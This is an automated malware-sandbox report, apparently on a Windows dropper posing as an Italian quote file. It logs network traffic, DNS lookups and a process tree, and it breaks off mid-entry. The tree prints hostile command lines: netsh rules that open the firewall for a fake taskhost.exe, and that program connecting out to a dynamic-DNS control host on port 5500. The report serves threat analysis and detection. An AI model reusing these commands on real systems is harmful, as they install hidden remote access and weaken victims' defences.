                      Jan 23, 2024 12:17:59.072958946 CET804972993.184.216.34192.168.2.4
                      Jan 23, 2024 12:17:59.073906898 CET804972993.184.216.34192.168.2.4
                      Jan 23, 2024 12:17:59.074006081 CET804972993.184.216.34192.168.2.4
                      Jan 23, 2024 12:17:59.074079037 CET4972980192.168.2.493.184.216.34
                      Jan 23, 2024 12:17:59.074244976 CET4972980192.168.2.493.184.216.34
                      Jan 23, 2024 12:17:59.078406096 CET4972980192.168.2.493.184.216.34
                      Jan 23, 2024 12:17:59.078449011 CET4972980192.168.2.493.184.216.34
                      Jan 23, 2024 12:18:17.642659903 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.642687082 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:17.643018007 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.643337965 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.643349886 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:17.886384010 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:17.887391090 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.887402058 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:17.888324022 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:17.888484001 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.888489962 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:17.888566971 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.891391039 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.891453028 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:17.891575098 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:17.891587019 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.082823992 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.117850065 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.118026018 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.118132114 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.119770050 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.119770050 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.119786978 CET4434973852.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.120383978 CET49738443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.124455929 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.124546051 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.124893904 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.124893904 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.124977112 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.365804911 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.367043018 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.367068052 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.368156910 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.368288040 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.368294954 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.368382931 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.368896961 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.368980885 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.368985891 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.369035959 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.488894939 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.488907099 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.661247969 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.661262035 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.661279917 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.661329985 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.661340952 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:18.661367893 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.661389112 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.743396997 CET49740443192.168.2.452.202.204.11
                      Jan 23, 2024 12:18:18.743443966 CET4434974052.202.204.11192.168.2.4
                      Jan 23, 2024 12:18:22.051400900 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.051444054 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.051523924 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.051836014 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.051851988 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.367913008 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.368402958 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.368437052 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.369436979 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.369497061 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.408909082 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.409085035 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.409183979 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.453907967 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.486505032 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.486571074 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.515590906 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:22.515680075 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.516412020 CET49747443192.168.2.423.54.200.159
                      Jan 23, 2024 12:18:22.516447067 CET4434974723.54.200.159192.168.2.4
                      Jan 23, 2024 12:18:25.620049000 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:18:25.742728949 CET550049749140.228.29.110192.168.2.4
                      Jan 23, 2024 12:18:25.744896889 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:18:25.746346951 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:18:25.770776987 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:18:25.893244028 CET550049749140.228.29.110192.168.2.4
                      Jan 23, 2024 12:18:35.908354044 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:18:36.031210899 CET550049749140.228.29.110192.168.2.4
                      Jan 23, 2024 12:18:46.033581018 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:18:46.156461954 CET550049749140.228.29.110192.168.2.4
                      Jan 23, 2024 12:18:56.174005032 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:18:56.297275066 CET550049749140.228.29.110192.168.2.4
                      Jan 23, 2024 12:19:06.299117088 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:19:06.422399998 CET550049749140.228.29.110192.168.2.4
                      Jan 23, 2024 12:19:16.425880909 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:19:16.548703909 CET550049749140.228.29.110192.168.2.4
                      Jan 23, 2024 12:19:26.549020052 CET497495500192.168.2.4140.228.29.110
                      Jan 23, 2024 12:19:26.671834946 CET550049749140.228.29.110192.168.2.4
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 23, 2024 12:17:58.739626884 CET5942153192.168.2.41.1.1.1
                      Jan 23, 2024 12:17:58.858447075 CET53594211.1.1.1192.168.2.4
                      Jan 23, 2024 12:18:22.180207968 CET6489453192.168.2.41.1.1.1
                      Jan 23, 2024 12:18:22.339932919 CET53648941.1.1.1192.168.2.4
                      Jan 23, 2024 12:18:40.412035942 CET6021553192.168.2.41.1.1.1
                      Jan 23, 2024 12:18:40.570370913 CET53602151.1.1.1192.168.2.4
                      Jan 23, 2024 12:19:04.518619061 CET5383253192.168.2.41.1.1.1
                      Jan 23, 2024 12:19:04.658823967 CET53538321.1.1.1192.168.2.4
                      Jan 23, 2024 12:19:28.738209009 CET5038453192.168.2.41.1.1.1
                      Jan 23, 2024 12:19:28.898479939 CET53503841.1.1.1192.168.2.4
                      Jan 23, 2024 12:19:52.877954960 CET6324753192.168.2.41.1.1.1
                      Jan 23, 2024 12:19:53.018186092 CET53632471.1.1.1192.168.2.4
                      Jan 23, 2024 12:20:16.956233978 CET6237653192.168.2.41.1.1.1
                      Jan 23, 2024 12:20:17.096158981 CET53623761.1.1.1192.168.2.4
                      Jan 23, 2024 12:20:41.206412077 CET5407653192.168.2.41.1.1.1
                      Jan 23, 2024 12:20:41.365834951 CET53540761.1.1.1192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 23, 2024 12:17:58.739626884 CET192.168.2.41.1.1.10xdb8cStandard query (0)www.example.comA (IP address)IN (0x0001)false
                      Jan 23, 2024 12:18:22.180207968 CET192.168.2.41.1.1.10xb714Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                      Jan 23, 2024 12:18:40.412035942 CET192.168.2.41.1.1.10xead6Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                      Jan 23, 2024 12:19:04.518619061 CET192.168.2.41.1.1.10x7c5Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                      Jan 23, 2024 12:19:28.738209009 CET192.168.2.41.1.1.10x49afStandard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                      Jan 23, 2024 12:19:52.877954960 CET192.168.2.41.1.1.10xc325Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                      Jan 23, 2024 12:20:16.956233978 CET192.168.2.41.1.1.10x3718Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                      Jan 23, 2024 12:20:41.206412077 CET192.168.2.41.1.1.10x286fStandard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 23, 2024 12:17:58.858447075 CET1.1.1.1192.168.2.40xdb8cNo error (0)www.example.com93.184.216.34A (IP address)IN (0x0001)false
                      Jan 23, 2024 12:18:22.339932919 CET1.1.1.1192.168.2.40xb714No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                      Jan 23, 2024 12:18:40.570370913 CET1.1.1.1192.168.2.40xead6No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                      Jan 23, 2024 12:19:04.658823967 CET1.1.1.1192.168.2.40x7c5No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                      Jan 23, 2024 12:19:28.898479939 CET1.1.1.1192.168.2.40x49afNo error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                      Jan 23, 2024 12:19:53.018186092 CET1.1.1.1192.168.2.40xc325No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                      Jan 23, 2024 12:20:17.096158981 CET1.1.1.1192.168.2.40x3718No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                      Jan 23, 2024 12:20:41.365834951 CET1.1.1.1192.168.2.40x286fNo error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                      • https:
                        • p13n.adobe.io
                      • armmf.adobe.com
                      • www.example.com

                      Click to jump to process

                      Target ID:0
                      Start time:12:17:57
                      Start date:23/01/2024
                      Path:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      Imagebase:0xe80000
                      File size:5'955'744 bytes
                      MD5 hash:32F35B78A3DC5949CE3C99F2981DEF6B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:12:18:00
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\msiexec.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
                      Imagebase:0x540000
                      File size:59'904 bytes
                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:6
                      Start time:12:18:02
                      Start date:23/01/2024
                      Path:C:\Games\viewer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
                      Imagebase:0x610000
                      File size:412'832 bytes
                      MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:12:18:03
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:12:18:03
                      Start date:23/01/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:12:18:03
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:12:18:03
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:11
                      Start time:12:18:03
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\reg.exe
                      Wow64 process (32bit):true
                      Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                      Imagebase:0xbc0000
                      File size:59'392 bytes
                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:12
                      Start time:12:18:04
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                      Wow64 process (32bit):true
                      Commandline:wmic process where (name="taskhost.exe") get commandline
                      Imagebase:0xf10000
                      File size:427'008 bytes
                      MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:13
                      Start time:12:18:04
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\findstr.exe
                      Wow64 process (32bit):true
                      Commandline:findstr /i "taskhost.exe"
                      Imagebase:0x9d0000
                      File size:29'696 bytes
                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:14
                      Start time:12:18:08
                      Start date:23/01/2024
                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
                      Imagebase:0x7ff6bc1b0000
                      File size:5'641'176 bytes
                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      Target ID:15
                      Start time:12:18:08
                      Start date:23/01/2024
                      Path:C:\Games\viewer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
                      Imagebase:0x610000
                      File size:412'832 bytes
                      MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:16
                      Start time:12:18:08
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 1
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:17
                      Start time:12:18:09
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:18
                      Start time:12:18:09
                      Start date:23/01/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:19
                      Start time:12:18:09
                      Start date:23/01/2024
                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                      Imagebase:0x7ff74bb60000
                      File size:3'581'912 bytes
                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:20
                      Start time:12:18:09
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\taskkill.exe
                      Wow64 process (32bit):true
                      Commandline:taskkill /im rundll32.exe /f
                      Imagebase:0x180000
                      File size:74'240 bytes
                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:21
                      Start time:12:18:09
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\mode.com
                      Wow64 process (32bit):true
                      Commandline:Mode 90,20
                      Imagebase:0x900000
                      File size:26'624 bytes
                      MD5 hash:FB615848338231CEBC16E32A3035C3F8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:23
                      Start time:12:18:09
                      Start date:23/01/2024
                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                      Imagebase:0x7ff74bb60000
                      File size:3'581'912 bytes
                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:24
                      Start time:12:18:10
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 2
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:25
                      Start time:12:18:10
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:26
                      Start time:12:18:11
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:27
                      Start time:12:18:11
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\reg.exe
                      Wow64 process (32bit):true
                      Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                      Imagebase:0xbc0000
                      File size:59'392 bytes
                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:28
                      Start time:12:18:13
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:29
                      Start time:12:18:15
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:31
                      Start time:12:18:16
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\taskkill.exe
                      Wow64 process (32bit):true
                      Commandline:taskkill /im rundll32.exe /f
                      Imagebase:0x180000
                      File size:74'240 bytes
                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:32
                      Start time:12:18:16
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\mode.com
                      Wow64 process (32bit):true
                      Commandline:Mode 90,20
                      Imagebase:0x900000
                      File size:26'624 bytes
                      MD5 hash:FB615848338231CEBC16E32A3035C3F8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:33
                      Start time:12:18:16
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 2
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:35
                      Start time:12:18:16
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\netsh.exe
                      Wow64 process (32bit):true
                      Commandline:netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
                      Imagebase:0x1560000
                      File size:82'432 bytes
                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:36
                      Start time:12:18:17
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\netsh.exe
                      Wow64 process (32bit):true
                      Commandline:netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                      Imagebase:0x1560000
                      File size:82'432 bytes
                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:37
                      Start time:12:18:17
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                      Wow64 process (32bit):true
                      Commandline:wmic process where (name="taskhost.exe") get commandline
                      Imagebase:0xf10000
                      File size:427'008 bytes
                      MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:38
                      Start time:12:18:17
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\findstr.exe
                      Wow64 process (32bit):true
                      Commandline:findstr /i "taskhost.exe"
                      Imagebase:0x9d0000
                      File size:29'696 bytes
                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:39
                      Start time:12:18:18
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\taskkill.exe
                      Wow64 process (32bit):true
                      Commandline:taskkill /im rundll32.exe /f
                      Imagebase:0x180000
                      File size:74'240 bytes
                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:40
                      Start time:12:18:18
                      Start date:23/01/2024
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout /t 2
                      Imagebase:0xd30000
                      File size:25'088 bytes
                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:41
                      Start time:12:18:19
                      Start date:23/01/2024
                      Path:C:\Games\taskhost.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
                      Imagebase:0xa0000
                      File size:2'648'008 bytes
                      MD5 hash:663FE548A57BBD487144EC8226A7A549
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:42
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Games\viewer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
                      Imagebase:0x610000
                      File size:412'832 bytes
                      MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:43
                      Start time:12:18:20
                      Start date:23/01/2024
                      Path:C:\Games\viewer.exe
                      Wow64 process (32bit):true
